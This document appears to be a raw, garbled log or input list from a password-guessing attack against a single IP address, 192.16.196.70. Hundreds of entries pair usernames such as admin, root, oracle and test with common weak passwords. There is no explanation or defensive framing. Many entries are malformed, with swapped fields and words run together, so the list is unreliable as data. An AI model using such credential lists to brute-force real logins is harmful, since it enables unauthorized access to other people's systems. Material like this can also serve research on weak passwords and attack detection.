no host Dwight Dwight 192.16.196.70 | no host Eatme Eatme 192.16.196.70 | no host Farming Farming 192.16.196.70 | no host Florida Florida 192.16.196.70 | no host Flowers Flowers 192.16.196.70 | no host Gizmo Gizmo 192.16.196.70 | no host Goalie Goalie 192.16.196.70 | no host Golden Golden 192.16.196.70 | no host GunnerGunner Harvey 192.16.196.70 | no host Harvey Homer 192.16.196.70 | no host Homer Jasper 192.16.196.70 | no host Jasper Kristy 192.16.196.70 | no host Kristy Krystal 192.16.196.70 | no host Krystal Laser 192.16.196.70 | no host Laser Maddog 192.16.196.70 | no host Maddog Marino 192.16.196.70 | no host Marino Marvin 192.16.196.70 | no host Marvin Natasha 192.16.196.70 | no host Natasha Nelson 192.16.196.70 | no host Nelson October 192.16.196.70 | no host October Parker 192.16.196.70 | no host Parker Passwor 192.16.196.70 | no host Passwor Petunia 192.16.196.70 | no host Petunia Prince 192.16.196.70 | no host Prince Pumpkin 192.16.196.70 | no host Pumpkin Qwert 192.16.196.70 | no host Qwert Ranger 192.16.196.70 | no host Ranger Sammie 192.16.196.70 | no host Sammie Senior 192.16.196.70 | no host Senior Shirley 192.16.196.70 | no host Shirley Slayer 192.16.196.70 | no host Slayer Spunky 192.16.196.70 | no host Spunky Tandy 192.16.196.70 | no host Tandy Trouble 192.16.196.70 | no host Trouble Vette 192.16.196.70 | no host Vette Warren 192.16.196.70 | no host Warren Wheels 192.16.196.70 | no host Wheels Winter 192.16.196.70 | no host Winter Zxcvbnm 192.16.196.70 | no host Zxcvbnm admin 192.16.196.70 | no host bamboo admin 192.16.196.70 | no host basket admin 192.16.196.70 | no host beaner admin 192.16.196.70 | no host bears admin 192.16.196.70 | no host beer admin 192.16.196.70 | no host benny admin 192.16.196.70 | no host bernard admin 192.16.196.70 | no host bertha admin 192.16.196.70 | no host bigbird admin 192.16.196.70 | no host bigred admin 192.16.196.70 | no host bird33 admin 192.16.196.70 | no host birdie admin 192.16.196.70 | no host blizzard admin 192.16.196.70 | no host bluesky admin 192.16.196.70 | no host bobby admin 192.16.196.70 | no host bootsie admin 192.16.196.70 | no host brewster admin 192.16.196.70 | no host bright admin 192.16.196.70 | no host bruce admin 192.16.196.70 | no host brutus admin 192.16.196.70 | no host bubba1 admin 192.16.196.70 | no host bubbles admin 192.16.196.70 | no host buck admin 192.16.196.70 | no host buffalo admin 192.16.196.70 | no host butler admin 192.16.196.70 | no host buzz admin 192.16.196.70 | no host byteme admin 192.16.196.70 | no host cactus admin 192.16.196.70 | no host camera admin 192.16.196.70 | no host candy admin 192.16.196.70 | no host canon admin 192.16.196.70 | no host cassie admin 192.16.196.70 | no host catalog admin 192.16.196.70 | no host cats admin 192.16.196.70 | no host celica admin 192.16.196.70 | no host celine admin 192.16.196.70 | no host cfi admin 192.16.196.70 | no host challeng admin 192.16.196.70 | no host champion admin 192.16.196.70 | no host cheryl admin 192.16.196.70 | no host chico admin 192.16.196.70 | no host christia admin 192.16.196.70 | no host chuck admin 192.16.196.70 | no host clark admin 192.16.196.70 | no host college admin 192.16.196.70 | no host conrad admin 192.16.196.70 | no host cool admin 192.16.196.70 | no host copper admin 192.16.196.70 | no host courtney admin 192.16.196.70 | no host craig admin 192.16.196.70 | no host crapp admin 192.16.196.70 | no host crawford admin 192.16.196.70 | no host creative admin 192.16.196.70 | no host crow admin 192.16.196.70 | no host cruise admin 192.16.196.70 | no host dance admin 192.16.196.70 | no host danielle admin 192.16.196.70 | no host darren admin 192.16.196.70 | no host database admin 192.16.196.70 | no host deadhead admin 192.16.196.70 | no host december admin 192.16.196.70 | no host deedee admin 192.16.196.70 | no host deliver admin 192.16.196.70 | no host detroit admin 192.16.196.70 | no host dilbert admin 192.16.196.70 | no host doc admin 192.16.196.70 | no host dogbert admin 192.16.196.70 | no host dominic admin 192.16.196.70 | no host elsie admin 192.16.196.70 | no host enter admin 192.16.196.70 | no host entropy admin 192.16.196.70 | no host etoile admin 192.16.196.70 | no host europe admin 192.16.196.70 | no host explorer admin 192.16.196.70 | no host fireman admin 192.16.196.70 | no host fish1 admin 192.16.196.70 | no host flamingo admin 192.16.196.70 | no host flash admin 192.16.196.70 | no host fletcher admin 192.16.196.70 | no host flip admin 192.16.196.70 | no host foxtrot admin 192.16.196.70 | no host french1 admin 192.16.196.70 | no host gabriell admin 192.16.196.70 | no host gaby admin 192.16.196.70 | no host galaxy admin 192.16.196.70 | no host galileo admin 192.16.196.70 | no host garlic admin 192.16.196.70 | no host gasman admin 192.16.196.70 | no host gator admin 192.16.196.70 | no host gemini admin 192.16.196.70 | no host general admin 192.16.196.70 | no host gerald admin 192.16.196.70 | no host gilles admin 192.16.196.70 | no host go admin 192.16.196.70 | no host goforit admin 192.16.196.70 | no host golden admin 192.16.196.70 | no host gone admin 192.16.196.70 | no host graymail admin 192.16.196.70 | no host greenday admin 192.16.196.70 | no host greg admin 192.16.196.70 | no host gretzky admin 192.16.196.70 | no host hacker admin 192.16.196.70 | no host hal9000 admin 192.16.196.70 | no host harold admin 192.16.196.70 | no host harrison admin 192.16.196.70 | no host harry admin 192.16.196.70 | no host harvey admin 192.16.196.70 | no host hector admin 192.16.196.70 | no host hell admin 192.16.196.70 | no host home admin 192.16.196.70 | no host homer admin 192.16.196.70 | no host hootie admin 192.16.196.70 | no host hotdog admin 192.16.196.70 | no host ib6ub9 admin 192.16.196.70 | no host icecream admin 192.16.196.70 | no host idiot admin 192.16.196.70 | no host imagine admin 192.16.196.70 | no host indian admin 192.16.196.70 | no host insane admin 192.16.196.70 | no host intern admin 192.16.196.70 | no host ireland admin 192.16.196.70 | no host irish admin 192.16.196.70 | no host isabelle admin 192.16.196.70 | no host jacob admin 192.16.196.70 | no host jaguar admin 192.16.196.70 | no host jason1 admin 192.16.196.70 | no host jenifer admin 192.16.196.70 | no host jenni admin 192.16.196.70 | no host jenny1 admin 192.16.196.70 | no host jensen john316 192.16.196.70 | no host admin judy 192.16.196.70 | no host admin julie1 192.16.196.70 | no host kelly1 admin 192.16.196.70 | no host kennedy admin 192.16.196.70 | no host kevin1 admin 192.16.196.70 | no host kim admin 192.16.196.70 | no host knicks admin 192.16.196.70 | no host lady admin 192.16.196.70 | no host lee admin 192.16.196.70 | no host leon admin 192.16.196.70 | no host lindsey admin 192.16.196.70 | no host ljf admin 192.16.196.70 | no host logical admin 192.16.196.70 | no host lucky1 admin 192.16.196.70 | no host lynn admin 192.16.196.70 | no host majordom admin 192.16.196.70 | no host mariah admin 192.16.196.70 | no host marine admin 192.16.196.70 | no host mario admin 192.16.196.70 | no host mariposa admin 192.16.196.70 | no host martin1 admin 192.16.196.70 | no host math admin 192.16.196.70 | no host maurice admin 192.16.196.70 | no host me admin 192.16.196.70 | no host memphis admin 192.16.196.70 | no host metal admin 192.16.196.70 | no host michael. admin 192.16.196.70 | no host michele admin 192.16.196.70 | no host minnie admin 192.16.196.70 | no host mirage admin 192.16.196.70 | no host mitch admin 192.16.196.70 | no host modem admin 192.16.196.70 | no host moocow admin 192.16.196.70 | no host ncc1701e admin 192.16.196.70 | no host nebraska admin 192.16.196.70 | no host nemesis admin 192.16.196.70 | no host netware admin 192.16.196.70 | no host news test 192.16.196.70 | no host nguyen test 192.16.196.70 | no host number9 test 192.16.196.70 | no host open test 192.16.196.70 | no host opus test 192.16.196.70 | no host patches test 192.16.196.70 | no host penny test 192.16.196.70 | no host pete test 192.16.196.70 | no host petey test 192.16.196.70 | no host phish test 192.16.196.70 | no host photo test 192.16.196.70 | no host pierce test 192.16.196.70 | no host pomme test 192.16.196.70 | no host porter test 192.16.196.70 | no host psalms test 192.16.196.70 | no host puppy test 192.16.196.70 | no host pyramid test 192.16.196.70 | no host python test 192.16.196.70 | no host quality test 192.16.196.70 | no host qwaszx test 192.16.196.70 | no host qwert test 192.16.196.70 | no host raiders test 192.16.196.70 | no host raquel test 192.16.196.70 | no host robotech test 192.16.196.70 | no host ronald test 192.16.196.70 | no host rosie test 192.16.196.70 | no host russell test 192.16.196.70 | no host ruy test 192.16.196.70 | no host savage test 192.16.196.70 | no host scotch test 192.16.196.70 | no host scruffy test 192.16.196.70 | no host sean test 192.16.196.70 | no host seattle test 192.16.196.70 | no host security test 192.16.196.70 | no host shadow1 shanti 192.16.196.70 | no host shirley test 192.16.196.70 | no host shorty test 192.16.196.70 | no host shotgun test 192.16.196.70 | no host skipper test 192.16.196.70 | no host slayer test 192.16.196.70 | no host smashing test 192.16.196.70 | no host snapple test 192.16.196.70 | no host sniper test 192.16.196.70 | no host snoopdog test 192.16.196.70 | no host snowman test 192.16.196.70 | no host sparrow test 192.16.196.70 | no host sports test 192.16.196.70 | no host sprite test 192.16.196.70 | no host spunky test 192.16.196.70 | no host stacey test 192.16.196.70 | no host star69 test 192.16.196.70 | no host start test 192.16.196.70 | no host station test 192.16.196.70 | no host stealth test 192.16.196.70 | no host sunny1 test 192.16.196.70 | no host super test 192.16.196.70 | no host surfer test 192.16.196.70 | no host target test 192.16.196.70 | no host taurus test 192.16.196.70 | no host teddy test 192.16.196.70 | no host teddy1 test 192.16.196.70 | no host tester test 192.16.196.70 | no host testing test 192.16.196.70 | no host theboss test 192.16.196.70 | no host thunderb test 192.16.196.70 | no host tim test 192.16.196.70 | no host topcat test 192.16.196.70 | no host topher test 192.16.196.70 | no host trevor test 192.16.196.70 | no host tricia test 192.16.196.70 | no host trixie test 192.16.196.70 | no host tucker test 192.16.196.70 | no host vader test 192.16.196.70 | no host valerie test 192.16.196.70 | no host veronica test 192.16.196.70 | no host viking test 192.16.196.70 | no host voodoo test 192.16.196.70 | no host warcraft test 192.16.196.70 | no host warner test 192.16.196.70 | no host warrior test 192.16.196.70 | no host watson test 192.16.196.70 | no host webster test 192.16.196.70 | no host wesley test 192.16.196.70 | no host western test 192.16.196.70 | no host wheels test 192.16.196.70 | no host wilbur test 192.16.196.70 | no host williams test 192.16.196.70 | no host wisdom test 192.16.196.70 | no host wolf1 test 192.16.196.70 | no host wolfgang test 192.16.196.70 | no host wrangler test 192.16.196.70 | no host xcountry test 192.16.196.70 | no host yankees test 192.16.196.70 | no host zachary test 192.16.196.70 | no host zeus test 192.16.196.70 | no host zombie test 192.16.196.70 | no host zorro test 192.16.196.70 | no host !@#$%^& test 192.16.196.70 | no host 0007 test 192.16.196.70 | no host 0249 test 192.16.196.70 | no host 1225 test 192.16.196.70 | no host 1234qwer test 192.16.196.70 | no host 14430 test 192.16.196.70 | no host 1951 test 192.16.196.70 | no host 1p2o3i test 192.16.196.70 | no host 1qw23e test 192.16.196.70 | no host 1sanjose test 192.16.196.70 | no host 21122112 test 192.16.196.70 | no host 2222 test 192.16.196.70 | no host 369 test 192.16.196.70 | no host 5252 test 192.16.196.70 | no host 5555 test 192.16.196.70 | no host 5683 test 192.16.196.70 | no host 777 test 192.16.196.70 | no host 80486 test 192.16.196.70 | no host 888888 test 192.16.196.70 | no host 911 test 192.16.196.70 | no host 92072 test 192.16.196.70 | no host 99999999 test 192.16.196.70 | no host @#$%^& Action 192.16.196.70 | no host Action Aggies 192.16.196.70 | no host Aggies Albert 192.16.196.70 | no host Albert Alyssa 192.16.196.70 | no host Alyssa Andrea 192.16.196.70 | no host Andrea Angela1 192.16.196.70 | no host Angela1 Author 192.16.196.70 | no host Author Babies 192.16.196.70 | no host Babies Bananas 192.16.196.70 | no host Bananas Barbara 192.16.196.70 | no host Barbara Barbie 192.16.196.70 | no host Barbie BasketbaBasketba 192.16.196.70 | no host Bastard Bastard 192.16.196.70 | no host Beatles Beatles 192.16.196.70 | no host Bigfoot Bigfoot 192.16.196.70 | no host Blaster Blaster 192.16.196.70 | no host Blowme Blowme 192.16.196.70 | no host Bookit Bookit 192.16.196.70 | no host Brasil Brasil 192.16.196.70 | no host Broncos Broncos 192.16.196.70 | no host Browns Browns 192.16.196.70 | no host Buddha Buddha 192.16.196.70 | no host Butthead Butthead 192.16.196.70 | no host Champs Champs 192.16.196.70 | no host ChangeMe ChangeMe 192.16.196.70 | no host Changeme Changeme 192.16.196.70 | no host Chelsea Chelsea 192.16.196.70 | no host Chevy Chevy 192.16.196.70 | no host Chevy1 Chevy1 192.16.196.70 | no host Christ Christ 192.16.196.70 | no host Christop Christop 192.16.196.70 | no host Chucky Chucky 192.16.196.70 | no host Cindi Cindi 192.16.196.70 | no host Cleaner Cleaner 192.16.196.70 | no host Clover Clover 192.16.196.70 | no host Coolman Coolman 192.16.196.70 | no host Copper Copper 192.16.196.70 | no host Cricket Cricket 192.16.196.70 | no host Darwin Darwin 192.16.196.70 | no host Death Death 192.16.196.70 | no host Defense Defense 192.16.196.70 | no host Denver Denver 192.16.196.70 | no host Detroit Detroit 192.16.196.70 | no host Dexter Dexter 192.16.196.70 | no host Doggie Doggie 192.16.196.70 | no host Doggy Doggy 192.16.196.70 | no host Dookie Dookie 192.16.196.70 | no host Drums Drums 192.16.196.70 | no host Edward Edward 192.16.196.70 | no host Elaine Elaine 192.16.196.70 | no host Elvis Elvis 192.16.196.70 | no host Espanol Espanol 192.16.196.70 | no host Except Except 192.16.196.70 | no host Football Football 192.16.196.70 | no host Francis Francis 192.16.196.70 | no host Freedom Freedom 192.16.196.70 | no host Frosty Frosty 192.16.196.70 | no host Fubar Fubar 192.16.196.70 | no host Garfield Garfield 192.16.196.70 | no host Garrett Garrett 192.16.196.70 | no host Gordon Gordon 192.16.196.70 | no host Hamster Hamster 192.16.196.70 | no host Hawaii Hawaii 192.16.196.70 | no host Hello Hello 192.16.196.70 | no host Herman Herman 192.16.196.70 | no host Hershey Hershey 192.16.196.70 | no host History History 192.16.196.70 | no host Hockey1 Hockey1 192.16.196.70 | no host Honda1 Honda1 192.16.196.70 | no host Isabelle Isabelle 192.16.196.70 | no host Jaeger Jaeger 192.16.196.70 | no host Jaguar Jaguar 192.16.196.70 | no host Jeanne Jeanne 192.16.196.70 | no host Jimbob Jimbob 192.16.196.70 | no host Junebug Junebug 192.16.196.70 | no host Kathryn Kathryn 192.16.196.70 | no host Kayla Kayla 192.16.196.70 | no host Killme Killme 192.16.196.70 | no host Kittens Kittens 192.16.196.70 | no host Kombat Kombat 192.16.196.70 | no host Kristin Kristin 192.16.196.70 | no host Lennon Lennon 192.16.196.70 | no host Letter Light 192.16.196.70 | no host Light Light 192.16.196.70 | no host Little Little 192.16.196.70 | no host Loveme Loveme 192.16.196.70 | no host Marley Marley 192.16.196.70 | no host Marshal Marshal 192.16.196.70 | no host Martha Martha 192.16.196.70 | no host Martin Martin 192.16.196.70 | no host Maveric Maveric 192.16.196.70 | no host Maxwell Maxwell 192.16.196.70 | no host Merlin Merlin 192.16.196.70 | no host Mittens Mittens 192.16.196.70 | no host Morris Morris 192.16.196.70 | no host Nascar Nascar 192.16.196.70 | no host Newton Newton 192.16.196.70 | no host Nissan Nissan 192.16.196.70 | no host Number1 Number1 192.16.196.70 | no host Packard Pantera 192.16.196.70 | no host Pantera Pantera 192.16.196.70 | no host Peewee Peewee 192.16.196.70 | no host Penguin Penguin 192.16.196.70 | no host Piglet Piglet 192.16.196.70 | no host Popcorn Popcorn 192.16.196.70 | no host Popeye Popeye 192.16.196.70 | no host Puckett Puckett 192.16.196.70 | no host Raistlin Raistlin 192.16.196.70 | no host Raymond Raymond 192.16.196.70 | no host Reader Reader 192.16.196.70 | no host Reading Reading 192.16.196.70 | no host Rebels Rebels 192.16.196.70 | no host Redskin Redskin 192.16.196.70 | no host Reefer Reefer 192.16.196.70 | no host Retard Retard 192.16.196.70 | no host Ripper Ripper 192.16.196.70 | no host Robbie Robbie 192.16.196.70 | no host Ronald Ronald 192.16.196.70 | no host Rooster Rooster 192.16.196.70 | no host Roping Roping 192.16.196.70 | no host Royals Royals 192.16.196.70 | no host Russel Russel 192.16.196.70 | no host Samson Samson 192.16.196.70 | no host Sarah1 Sarah1 192.16.196.70 | no host Scarlett Scarlett 192.16.196.70 | no host Service Service 192.16.196.70 | no host Shooter Shooter 192.16.196.70 | no host Sidney Sidney 192.16.196.70 | no host Simple Simple 192.16.196.70 | no host Skater Skater 192.16.196.70 | no host Skinny Skinny 192.16.196.70 | no host Smiles Smiles 192.16.196.70 | no host Sniper Sniper 192.16.196.70 | no host Special Special 192.16.196.70 | no host Spiri tSpirit 192.16.196.70 | no host Sprite Sprite 192.16.196.70 | no host Stimpy Stimpy 192.16.196.70 | no host Strider Strider 192.16.196.70 | no host Success Success 192.16.196.70 | no host SunShine SunShine 192.16.196.70 | no host Superman Superman 192.16.196.70 | no host Susan Susan 192.16.196.70 | no host Sweetie Sweetie 192.16.196.70 | no host Tamara Tamara 192.16.196.70 | no host Tanker Tanker 192.16.196.70 | no host Tardis Tardis 192.16.196.70 | no host Tasha Tasha 192.16.196.70 | no host Taurus Taurus 192.16.196.70 | no host Theman Theman 192.16.196.70 | no host Theresa Theresa 192.16.196.70 | no host Tiffany Tiffany 192.16.196.70 | no host Tomcat Tomcat 192.16.196.70 | no host Tractor Tractor 192.16.196.70 | no host Trevor Trevor 192.16.196.70 | no host Trucks Trucks 192.16.196.70 | no host Trumpet Trumpet 192.16.196.70 | no host Vampire Vampire 192.16.196.70 | no host Vanessa Vanessa 192.16.196.70 | no host Victoria Victoria 192.16.196.70 | no host Warez Warez 192.16.196.70 | no host Warrior Warrior 192.16.196.70 | no host Weezer Weezer 192.16.196.70 | no host Welcome1 Welcome1 192.16.196.70 | no host Whales Whales 192.16.196.70 | no host Whateve Whateve 192.16.196.70 | no host Wicked Wicked 192.16.196.70 | no host Willy Willy 192.16.196.70 | no host oracle Woodland 192.16.196.70 | no host oracle Ziggy 192.16.196.70 | no host oracle a 192.16.196.70 | no host oracle abby 192.16.196.70 | no host oracle abcd 192.16.196.70 | no host oracle abcdef 192.16.196.70 | no host oracle action 192.16.196.70 | no host oracle active 192.16.196.70 | no host oracle advil 192.16.196.70 | no host oracle aeh 192.16.196.70 | no host oracle alfred 192.16.196.70 | no host oracle aliens 192.16.196.70 | no host oracle alison 192.16.196.70 | no host oracle alpha1 192.16.196.70 | no host oracle amanda1 192.16.196.70 | no host oracle amelie 192.16.196.70 | no host oracle andre 192.16.196.70 | no host oracle angels 192.16.196.70 | no host oracle angus 192.16.196.70 | no host oracle apple1 192.16.196.70 | no host oracle ariane 192.16.196.70 | no host oracle arizona 192.16.196.70 | no host oracle asdfghjk 192.16.196.70 | no host oracle aspen 192.16.196.70 | no host oracle asterix 192.16.196.70 | no host oracle awesome 192.16.196.70 | no host oracle aylmer 192.16.196.70 | no host oracle bach 192.16.196.70 | no host oracle barry 192.16.196.70 | no host oracle basil 192.16.196.70 | no host oracle baskeT 192.16.196.70 | no host beanie beanie 192.16.196.70 | no host oracle beautifu 192.16.196.70 | no host nebolit benoit 192.16.196.70 | no host benson benson 192.16.196.70 | no host benrie bernie 192.16.196.70 | no host oracle bfi 192.16.196.70 | no host oracle bigmac 192.16.196.70 | no host oracle bigman 192.16.196.70 | no host oracle binky 192.16.196.70 | no host oracle biology 192.16.196.70 | no host root bird 192.16.196.70 | no host root blondie 192.16.196.70 | no host root blowfish 192.16.196.70 | no host root bmw 192.16.196.70 | no host root bobcat 192.16.196.70 | no host root boogie 192.16.196.70 | no host root booster 192.16.196.70 | no host root boots 192.16.196.70 | no host root bozo 192.16.196.70 | no host root bridge 192.16.196.70 | no host root bridges 192.16.196.70 | no host root buffy 192.16.196.70 | no host root bull 192.16.196.70 | no host root bullet 192.16.196.70 | no host root butch 192.16.196.70 | no host root button 192.16.196.70 | no host root buttons 192.16.196.70 | no host root caesar 192.16.196.70 | no host root campbell 192.16.196.70 | no host root camping 192.16.196.70 | no host root canced 192.16.196.70 | no host root canela 192.16.196.70 | no host root cannon 192.16.196.70 | no host root cannonda 192.16.196.70 | no host root cardinal 192.16.196.70 | no host root carl 192.16.196.70 | no host root carlos 192.16.196.70 | no host root carolina 192.16.196.70 | no host root cascade 192.16.196.70 | no host root castle 192.16.196.70 | no host root catfish 192.16.196.70 | no host root cccccc 192.16.196.70 | no host root center 192.16.196.70 | no host root cesar 192.16.196.70 | no host root chance 192.16.196.70 | no host root chaos 192.16.196.70 | no host root charity 192.16.196.70 | no host root charlie1 192.16.196.70 | no host root charlott 192.16.196.70 | no host root cherry 192.16.196.70 | no host root chevy 192.16.196.70 | no host root china 192.16.196.70 | no host root chiquita 192.16.196.70 | no host root christop 192.16.196.70 | no host root church 192.16.196.70 | no host root clipper 192.16.196.70 | no host root cobra 192.16.196.70 | no host root concept 192.16.196.70 | no host root cookies 192.16.196.70 | no host root corrado 192.16.196.70 | no host root corwin 192.16.196.70 | no host root cosmos 192.16.196.70 | no host root cougars 192.16.196.70 | no host root cracker 192.16.196.70 | no host cuddies cuddles 192.16.196.70 | no host cutie cutie 192.16.196.70 | no host cynthia cynthia 192.16.196.70 | no host cyrano cyrano 192.16.196.70 | no host daddy daddy 192.16.196.70 | no host dan dan 192.16.196.70 | no host oracle dasha 192.16.196.70 | no host oracle dead 192.16.196.70 | no host oracle denali 192.16.196.70 | no host oracle depeche 192.16.196.70 | no host oracle design 192.16.196.70 | no host oracle deutsch 192.16.196.70 | no host oracle dexter 192.16.196.70 | no host oracle dgj 192.16.196.70 | no host oracle diana 192.16.196.70 | no host oracle diane 192.16.196.70 | no host oracle dickhead 192.16.196.70 | no host oracle director 192.16.196.70 | no host oracle dirk 192.16.196.70 | no host oracle dodgers 192.16.196.70 | no host oracle dollars 192.16.196.70 | no host oracle dolphins 192.16.196.70 | no host oracle don 192.16.196.70 | no host oracle doom2 192.16.196.70 | no host oracle doug 192.16.196.70 | no host oracle dougie 192.16.196.70 | no host oracle dragonfl 192.16.196.70 | no host oracle dude 192.16.196.70 | no host oracle dundee 192.16.196.70 | no host oracle e-mail 192.16.196.70 | no host oracle easter 192.16.196.70 | no host oracle eclipse 192.16.196.70 | no host oracle electric 192.16.196.70 | no host elliot elliot 192.16.196.70 | no host energy energy 192.16.196.70 | no host eugene eugene 192.16.196.70 | no host exalibur excalibu 192.16.196.70 | no host admin express 192.16.196.70 | no host admin fiona 192.16.196.70 | no host admin fireball 192.16.196.70 | no host admin first 192.16.196.70 | no host admin fletch 192.16.196.70 | no host admin flight 192.16.196.70 | no host admin florida 192.16.196.70 | no host admin fool 192.16.196.70 | no host admin fountain 192.16.196.70 | no host admin fozzie 192.16.196.70 | no host admin frederic 192.16.196.70 | no host admin frogs 192.16.196.70 | no host admin front242 192.16.196.70 | no host admin fugazi 192.16.196.70 | no host admin fun 192.16.196.70 | no host admin future 192.16.196.70 | no host admin gambit 192.16.196.70 | no host admin garnet 192.16.196.70 | no host admin gary 192.16.196.70 | no host admin genius 192.16.196.70 | no host admin georgia 192.16.196.70 | no host admin gibson 192.16.196.70 | no host admin glenn 192.16.196.70 | no host admin goat 192.16.196.70 | no host admin goblue 192.16.196.70 | no host admin gocougs 192.16.196.70 | no host admin godzilla 192.16.196.70 | no host admin gofish 192.16.196.70 | no host admin gordon 192.16.196.70 | no host admin grandma 192.16.196.70 | no host admin graphic 192.16.196.70 | no host admin gray 192.16.196.70 | no host admin gretchen 192.16.196.70 | no host admin groovy 192.16.196.70 | no host admin guess 192.16.196.70 | no host adminguido admin 192.16.196.70 | no host guinness adminh 192.16.196.70 | no host 2opolo admin 192.16.196.70 | no host hanna test 192.16.196.70 | no host hanson test 192.16.196.70 | no host happyday test 192.16.196.70 | no host hazel test 192.16.196.70 | no host hello1 test 192.16.196.70 | no host homebrew test 192.16.196.70 | no host honda1 test 192.16.196.70 | no host horizon test 192.16.196.70 | no host hornet test 192.16.196.70 | no host image test 192.16.196.70 | no host impala test 192.16.196.70 | no host informix test 192.16.196.70 | no host irene test 192.16.196.70 | no host isaac test 192.16.196.70 | no host jamaica test 192.16.196.70 | no host james1 test 192.16.196.70 | no host jan test 192.16.196.70 | no host japan test 192.16.196.70 | no host jared test 192.16.196.70 | no host jazz jeanette 192.16.196.70 | no host jeanette test 192.16.196.70 | no host jeff test 192.16.196.70 | no host jimbo test 192.16.196.70 | no host jkm joana 192.16.196.70 | no host joanna Joel 192.16.196.70 | no host joel johnson 192.16.196.70 | no host johnson jojo 192.16.196.70 | no host jojo jordon 192.16.196.70 | no host jordan23 Josh 192.16.196.70 | no host josh Josie 192.16.196.70 | no host josie Julia 192.16.196.70 | no host julia Justin 192.16.196.70 | no host justin1 Kathy 192.16.196.70 | no host kathy katie 192.16.196.70 | no host katie test 192.16.196.70 | no host kenneth test 192.16.196.70 | no host khan test 192.16.196.70 | no host kingdom kitty 192.16.196.70 | no host kitty test 192.16.196.70 | no host kleenex test 192.16.196.70 | no host kramer test 192.16.196.70 | no host laddie test 192.16.196.70 | no host ladybug test 192.16.196.70 | no host lamer test 192.16.196.70 | no host larry1 test 192.16.196.70 | no host law test 192.16.196.70 | no host ledzep test 192.16.196.70 | no host light test 192.16.196.70 | no host liverpoo test 192.16.196.70 | no host lloyd test 192.16.196.70 | no host looney test 192.16.196.70 | no host lorraine test 192.16.196.70 | no host lovely test 192.16.196.70 | no host lucas test 192.16.196.70 | no host lulu test 192.16.196.70 | no host magnum test 192.16.196.70 | no host mailer test 192.16.196.70 | no host mailman test 192.16.196.70 | no host malcolm test 192.16.196.70 | no host mantra test 192.16.196.70 | no host marcus test 192.16.196.70 | no host maria test 192.16.196.70 | no host mars test 192.16.196.70 | no host marvin test 192.16.196.70 | no host master1 test 192.16.196.70 | no host mayday test 192.16.196.70 | no host mazda1 test 192.16.196.70 | no host medical test 192.16.196.70 | no host megan test 192.16.196.70 | no host memory test 192.16.196.70 | no host meow test 192.16.196.70 | no host metallic test 192.16.196.70 | no host midori user 192.16.196.70 | no host mikael admin 192.16.196.70 | no host mike1 user 192.16.196.70 | no host miki admin 192.16.196.70 | no host miles root 192.16.196.70 | no host million root 192.16.196.70 | no host mimi root 192.16.196.70 | no host minou root 192.16.196.70 | no host miranda root 192.16.196.70 | no host misha root 192.16.196.70 | no host mishka root 192.16.196.70 | no host mission root 192.16.196.70 | no host molly1 root 192.16.196.70 | no host money1 root 192.16.196.70 | no host monopoly root 192.16.196.70 | no host montreal root 192.16.196.70 | no host mookie root 192.16.196.70 | no host moomoo root 192.16.196.70 | no host moroni root 192.16.196.70 | no host mortimer root 192.16.196.70 | no host naomi root 192.16.196.70 | no host nautica root 192.16.196.70 | no host nesbitt root 192.16.196.70 | no host new root 192.16.196.70 | no host nick root 192.16.196.70 | no host niki root 192.16.196.70 | no host nikita root 192.16.196.70 | no host nimrod root 192.16.196.70 | no host nirvana1 root 192.16.196.70 | no host norman root 192.16.196.70 | no host nugget root 192.16.196.70 | no host nurse root 192.16.196.70 | no host oatmeal root 192.16.196.70 | no host biwan root 192.16.196.70 | no host october root 192.16.196.70 | no host olivier oliver 192.16.196.70 | no host olivier root 192.16.196.70 | no host oranges root 192.16.196.70 | no host orchid root 192.16.196.70 | no host pacers root 192.16.196.70 | no host packer root 192.16.196.70 | no host parrot root 192.16.196.70 | no host passion root 192.16.196.70 | no host paula root 192.16.196.70 | no host pearl root 192.16.196.70 | no host pedro root 192.16.196.70 | no host peggy root 192.16.196.70 | no host percy root 192.16.196.70 | no host petunia root 192.16.196.70 | no host philip root 192.16.196.70 | no host philip root 192.16.196.70 | no host phoenix1 root 192.16.196.70 | no host pinkfloy root 192.16.196.70 | no host pirate root 192.16.196.70 | no host pisces root 192.16.196.70 | no host planet root 192.16.196.70 | no host play root 192.16.196.70 | no host playboy root 192.16.196.70 | no host player root 192.16.196.70 | no host players root 192.16.196.70 | no host poiuyt root 192.16.196.70 | no host politics root 192.16.196.70 | no host polo root 192.16.196.70 | no host pookie1 root 192.16.196.70 | no host praise root 192.16.196.70 | no host preston root 192.16.196.70 | no host prof root 192.16.196.70 | no host promethe root 192.16.196.70 | no host property root 192.16.196.70 | no host public root 192.16.196.70 | no host quebec root 192.16.196.70 | no host quest root 192.16.196.70 | no host qwerty12 root 192.16.196.70 | no host racerx root 192.16.196.70 | no host racoon root 192.16.196.70 | no host rambo1 root 192.16.196.70 | no host raptor root 192.16.196.70 | no host redrum root 192.16.196.70 | no host redwing root 192.16.196.70 | no host republic root 192.16.196.70 | no host research root 192.16.196.70 | no host reynolds root 192.16.196.70 | no host reznor root 192.16.196.70 | no host rhonda root 192.16.196.70 | no host ricky root 192.16.196.70 | no host river root 192.16.196.70 | no host robinhoo root 192.16.196.70 | no host rock root 192.16.196.70 | no host roman rootroxy 192.16.196.70 | no host root roy 192.16.196.70 | no host root ruby 192.16.196.70 | no host root rufus 192.16.196.70 | no host root rugby 192.16.196.70 | no host root rusty 192.16.196.70 | no host root ruth 192.16.196.70 | no host root rux 192.16.196.70 | no host root safety 192.16.196.70 | no host root sailor 192.16.196.70 | no host root sally 192.16.196.70 | no host root sapphire 192.16.196.70 | no host root sarah1 192.16.196.70 | no host root sasha 192.16.196.70 | no host root saskia 192.16.196.70 | no host root sbdc 192.16.196.70 | no host root scarlett 192.16.196.70 | no host root scooby 192.16.196.70 | no host root scooter1 192.16.196.70 | no host root scorpion 192.16.196.70 | no host root scuba1 192.16.196.70 | no host root septembe 192.16.196.70 | no host root shawn 192.16.196.70 | no host root shelley 192.16.196.70 | no host root sherry 192.16.196.70 | no host root shit 192.16.196.70 | no host root skidoo 192.16.196.70 | no host root slacker 192.16.196.70 | no host root smiths 192.16.196.70 | no host root snuffy 192.16.196.70 | no host root soccer1 192.16.196.70 | no host root softball 192.16.196.70 | no host root sonny 192.16.196.70 | no host root space 192.16.196.70 | no host root spain 192.16.196.70 | no host root speedo 192.16.196.70 | no host root spitfire 192.16.196.70 | no host root ssssss 192.16.196.70 | no host root steph 192.16.196.70 | no host root sting1 192.16.196.70 | no host root stingray 192.16.196.70 | no host root stormy 192.16.196.70 | no host root strawber 192.16.196.70 | no host root sugar 192.16.196.70 | no host root sunbird 192.16.196.70 